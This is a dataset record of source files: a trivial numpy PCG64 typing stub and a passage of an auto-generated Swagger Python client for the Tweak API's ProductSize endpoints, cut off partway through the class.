2020-08-17T11:09:51.000Z
|
2021-12-15T18:09:47.000Z
|
data/typing/numpy.random._pcg64.py
|
pydata-apis/python-api-record
|
684cffbbb6dc6e81f9de4e02619c8b0ebc557b2b
|
[
"MIT"
] | 7
|
2020-08-19T05:06:47.000Z
|
2020-11-04T05:10:38.000Z
|
from typing import *
class PCG64:
pass
| 7.5
| 20
| 0.666667
| 6
| 45
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 0.288889
| 45
| 5
| 21
| 9
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
224a9d9e93611122a7f9d210d921ffa59f7873c1
| 174,352
|
py
|
Python
|
TweakApi/apis/product_size_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/product_size_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/product_size_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ProductSizeApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def product_sizes_change_stream_get(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_change_stream_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_change_stream_get_with_http_info(**kwargs)
return data
def product_sizes_change_stream_get_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_change_stream_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'options' in params:
query_params['options'] = params['options']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_change_stream_post(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_change_stream_post_with_http_info(**kwargs)
else:
(data) = self.product_sizes_change_stream_post_with_http_info(**kwargs)
return data
def product_sizes_change_stream_post_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_change_stream_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'options' in params:
form_params.append(('options', params['options']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_count_get(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_count_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_count_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_count_get_with_http_info(**kwargs)
return data
def product_sizes_count_get_with_http_info(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_count_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_count_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/count'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_find_one_get(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_find_one_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_find_one_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_find_one_get_with_http_info(**kwargs)
return data
def product_sizes_find_one_get_with_http_info(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_find_one_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_find_one_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/findOne'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_get(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[ProductSize]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_get_with_http_info(**kwargs)
return data
def product_sizes_get_with_http_info(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[ProductSize]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProductSize]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_delete(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_delete_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_delete_with_http_info(id, **kwargs)
return data
def product_sizes_id_delete_with_http_info(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_exists_get(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_exists_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_exists_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_exists_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_exists_get_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_exists_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_exists_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_exists_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/exists'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_get(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_get_with_http_info(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_head(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_head(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_head_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_head_with_http_info(id, **kwargs)
return data
def product_sizes_id_head_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_head_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_head`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_count_get(self, id, **kwargs):
"""
Counts materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_count_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_materials_count_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_materials_count_get_with_http_info(self, id, **kwargs):
"""
Counts materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_count_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_fk_get_with_http_info(id, fk, **kwargs)
return data
